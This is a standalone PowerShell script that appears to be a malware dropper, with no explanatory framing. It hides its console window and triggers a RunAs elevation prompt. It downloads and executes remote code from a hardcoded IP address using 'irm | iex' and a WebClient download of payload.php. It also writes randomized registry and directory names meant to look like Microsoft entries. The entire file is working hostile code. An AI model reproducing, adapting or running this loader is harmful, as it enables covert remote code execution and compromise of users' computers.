Add-Type -Name W -Namespace H -MemberDefinition '[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr h,int c);[DllImport("kernel32.dll")]public static extern IntPtr GetConsoleWindow();' -EA 0
[H.W]::ShowWindow([H.W]::GetConsoleWindow(),0)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

$isAdmin=([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

if(-not $isAdmin -and -not $env:_xR){
    try{
        $__tb="$env:TEMP\$([guid]::NewGuid().ToString('N').Substring(0,8)).ps1"
        [IO.File]::WriteAllText($__tb,"[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;`$env:_xR='1';irm http://198.245.53.26/st.txt|iex",[Text.Encoding]::UTF8)
        $p=Start-Process powershell.exe -ArgumentList "-NoP -EP Bypass -W Hidden -File `"$__tb`"" -Verb RunAs -PassThru -EA Stop
        if($p){ exit }
    }catch{}
}

$isAdmin=([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

$guid=try{(Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Cryptography" -EA Stop).MachineGuid}catch{[guid]::NewGuid().ToString()}
$ts=[DateTime]::Now.Ticks.ToString()
$sha=[Security.Cryptography.SHA256]::Create()
$svcName=(($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($guid+"svc"+$ts))|%{$_.ToString("x2")})-join"").Substring(0,16)
$fileName=(($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($guid+"file"+$ts))|%{$_.ToString("x2")})-join"").Substring(0,20)
$regRandom=(($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($guid+"reg"+$ts))|%{$_.ToString("x2")})-join"").Substring(0,12)
$dynReg="HKCU:\Software\Microsoft\$regRandom"

if(-not(Test-Path $dynReg)){New-Item -Path $dynReg -Force|Out-Null}
Set-ItemProperty -Path $dynReg -Name "SvcName" -Value $svcName -Force
Set-ItemProperty -Path $dynReg -Name "FileName" -Value $fileName -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows" -Name "CU" -Value $dynReg -Force

if($isAdmin){
    $instDir="$env:ProgramData\Microsoft\$svcName"
}else{
    $instDir="$env:APPDATA\Microsoft\$svcName"
}
if(-not(Test-Path $instDir)){md $instDir -Force|Out-Null}
$f="$instDir\$fileName.txt"

$wc=New-Object Net.WebClient
$wc.Headers.Add('User-Agent','PowerShell')
$wc.DownloadFile('http://198.245.53.26/payload.php',$f)

$env:_sN=$svcName
$env:_fN=$fileName
$env:_sU='1'

& ([ScriptBlock]::Create((gc $f -Raw))) -ScriptPath $f